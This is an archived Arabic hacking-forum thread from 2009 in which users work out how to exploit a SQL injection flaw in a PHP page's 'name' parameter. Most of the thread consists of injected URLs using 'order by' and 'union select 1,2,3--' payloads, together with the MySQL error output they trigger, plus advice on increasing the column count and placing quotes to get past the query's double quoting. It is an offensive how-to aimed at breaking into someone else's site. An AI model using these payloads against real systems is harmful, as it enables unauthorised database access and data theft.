:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكلة في الحقن ، ارجو المساعدة (http://www.vbspiders.com/vb/t21515.html)

megainfo 10-18-2009 06:39 PM
مشكلة في الحقن ، ارجو المساعدة
 
بسـم اللهـ الرحـمن الرحيم


السلام عليكم


عندي مشكلة في الحقن بآسكول ، عندما اضيف ' للمسار يظهر هذا الخطء

كود PHP:
http://www.xxxx.com/get_model_desc.php?name=PT01' 

------------------------------
كود PHP:
Query error:You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near ''PT01''' at line 1


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\Program Files\demo\www\db.php on line 88 
ولكن عندما اضيف او ، لا يظهر اي خطء !!
كود PHP:
http://www.xxxx.com/get_model_desc.php?name=PT01+order+by+10-- 

او
كود PHP:
http://www.xxxx.com/get_model_desc.php?name=PT01+and[/url] union+select+1,2,3-- 
اذن ان المبرمج واضع " double quote مكان ' quote في sql
مثال :
كود PHP:
  select from tab_demo where category_name="$_GET['name']" 



هل من طريقة لعمل حقن في هذه الحالة ، ارجو المساعدة ...ضروري و عاجل لمختصي الحقن

T-72 10-19-2009 12:46 PM
كيفك ي باشا

الله يوفقك ي رب

لو فيي ساعدك كنت م قصرت

انت مفضل عليي

KaLa$nikoV 10-19-2009 05:48 PM
1- شكلك قاعد تصمم سكربت وتحاول تتاكد اذا في مجال يخترق ولا نو وان شاء الله انو ما يخترق

2- ما في اشي بعيد عن الهاكر انا كل يوم اتعلم الكثير باختراق السكول لانها ثغره سريعه التطور ويدخلها الكثير من الامور

حسب وصفك للخطا هناك طريقه للاختراق لكني لم اتعلمها بعد

وعندما اتعلمها ان شاء الله افيدك اكثر

لي رجعه باذن الله مفيده لك اكثر

megainfo 10-20-2009 12:31 AM
شكرا على الرد إخواني الأعزاء ،

بالفعل اخي VoLc4n0 ما في اشي بعيد عن الهاكر , انا استعمل Zend Framework لذا انصح به اخواني مبرمجي PHP





بالنسبةالمشكلتي شاهد هذه الفديو ، فالحل فيها :

http://www.4shared.com/file/12733808...ml?err=no-sess
فإن صاحب الموقع زميل لي، عامل فيلتر على سكيول , لو في حد عارف طريقة لعمل ، فهو متشكر "للفاءدة العامة" :icon222:

T-72 11-05-2009 08:24 AM
برايي ازا وضعت
هي الاشاره ' بعد المتغير وانتا عم تبحث عن عدد الاعمده
وانتا ايضا تبحث عن العامود المصاب

مثال

كود:
http://www.xxxx.com/get_model_desc.php?name=PT01'+and[/url] union+select+1,2,3--
رح يتجاوب مع طلبك الخطأ

جرب
وخبرني

اوك ؟؟؟


بر[ب]

KaLa$nikoV 11-05-2009 03:07 PM
زود خيو على
order by 10

على هذا الاسلوب

order by 20
order by 30
order by 40
بهدف ان يطلع لك خطا

بالتوفيق


الساعة الآن 09:03 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0